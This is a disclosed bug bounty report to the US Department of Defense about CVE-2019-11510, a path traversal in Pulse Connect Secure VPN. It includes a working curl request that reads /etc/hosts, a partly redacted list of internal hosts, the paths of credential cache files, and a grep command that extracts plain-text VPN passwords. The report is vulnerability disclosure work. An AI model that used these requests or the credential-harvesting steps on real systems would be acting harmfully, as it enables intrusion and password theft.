[CVE-2019-11510 ] Path Traversal on ████████ leads to leaked passwords, RCE, etc

Disclosed: 2019-12-02 19:46:35 By cdl To deptofdefense
Critical
Vulnerability Details
**Summary / Description:** █████ is vulnerable to Path Traversal which can lead to remote code execution. ## Impact Critical ## Step-by-step Reproduction Instructions 1. Run the following `cURL` command to get the file `/etc/hosts` ``` curl --path-as-is -k -D- 'https://███████/dana-na/../dana/html5acc/guacamole/../../../../../../etc/hosts?/dana/html5acc/guacamole/#' ``` ``` ## File generated by DSNet::Hosts::update at Thu Aug 1 13:24:40 2019 127.0.0.1 localhost █████128.141 KMPC1_Node4 █████████252.82 acrcxznxx07d-10███ ███████252.74 acrcxznxx06d-10███ ███252.67 ODA-SCAN███ █████████252.65 ODA-VIP-1█████████ █████████252.63 ODA-1██████ ███252.196 subversion████████ ██████252.134 acrcxznxx07d-12██████ ██████████252.13 ODA-2████ █████251.16 acdeva0xxb5l010███ ████251.15 acdeva0xxb5l009████████ ███████251.14 acdeva0xxb5l008████████ █████████250.239 devikrome█████ ███████250.216 ws.soa██████ ██████████250.192 ac0hxzndb01d-07.rsn.aac████ █████████250.16 devccimm███ ██████250.112 devauth████████l devauth████████ ████████250.104 ac0hxznap02d-03████████ ███████1.235 spex████████ ████1.205 auth████████ ███1.164 internal████ internal███████ ████1.142 ensq██████████ ensq█████ ███████0.92 ac0hqa0xxa3b021.rsn.aac█████████ ███0.55 g2g███ █████████0.177 Ac0hqa0xxa1b005.rsn.aac█████████ █████64.181 ac0hqsmap13p ████64.142 ac0hqsmxx03p ██████████40.237 emmggb████████ ████████40.126 ac0hqapxx25p.rsn.aac████████ ██████████221.42 gcrcknox gcrcknox████ █████████220.81 ft1ariss█████ ██████220.245 ccimm█████████ ██████220.150 ensqrtn████ ███████220.145 pthensqtrain██████ ██████212.9 acrcea0xxb5l035█████ ██████212.64 acrcea0xxb5l034██████ ███18.60 questcentral questcentral███ ██████████163.35 hrcremedy█████ ███████78.107 afrissimt.rs████ ██████8.61 netscout███████ ████████205.203 ac0hqa0xxb5l007█████ █████████205.202 ac0hqa0xxb5l006██████████ ██████205.200 acrtna0xxb5l003█████ ███146.8 AC0HQC2A0A3B021.RSN.AAC████████ █████████146.7 AC0HQC2A0A3B020.rsn.aac████████ █████████145.91 ac0hqwsxx04p.rsn.aac█████ █████145.149 caliber11.rsn.aac███████ ████145.118 ac0hqwsap06p.rsn.aac██████████ ██████144.95 ikrome████ ft1ikrome█████████ ████144.91 Auth██████████ █████144.216 ac0hqc2a0a3b010.rsn.aac██████ ████197.16 acft1a0xxb5l005███████ ███197.15 acft1a0xxb5l004███ ████196.62 ft1ccimm██████████ █████████196.28 ft1auth████ ███████195.247 ac0hldbxx02t████ ███195.246 ac0hldbxx01t█████ ████195.195 ac0hxzndb04t-01████ ██████195.188 ac0hxznap04t-03█████████ ██████████195.158 ac0hxznxx24t-02██████ ██████████195.133 ft1internal████████ ████████195.127 ac0hxznap03t-03█████████ ██████████194.78 ws13t.soa█████ ws14t.soa█████ █████████194.165 ft1ensq███ ac0hxznxx03t-08-ensq_wls1█████████ █████194.119 rmdwebtopft1███████ ``` We can grab any other file on this system: ``` /data/runtime/mtmp/system /data/runtime/mtmp/lmdb/dataa/data.mdb /data/runtime/mtmp/lmdb/dataa/lock.mdb /data/runtime/mtmp/lmdb/randomVal/data.mdb /data/runtime/mtmp/lmdb/randomVal/lock.mdb ``` The VPN user and hashed passwords are stored in the `mtmp/system` file, but when users log into the application, it caches the plain-text password into `dataa/data.mdb`. ``` grep 'password@9' data.mdb -a ``` will get you a load of plain-text passwords ████████ ## Product, Version, and Configuration (If applicable) https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101 ## Suggested Mitigation/Remediation Actions Update the Pulse Connect Secure VPN ## Impact Critical, an attacker can get code execution with this vulnerability. ## References: https://hackerone.com/reports/591295 Thanks, Corben (@cdl)
Actions
View on HackerOne
Report Stats
  • Report ID: 671857
  • State: Closed
  • Substate: resolved
  • Upvotes: 9
Share this report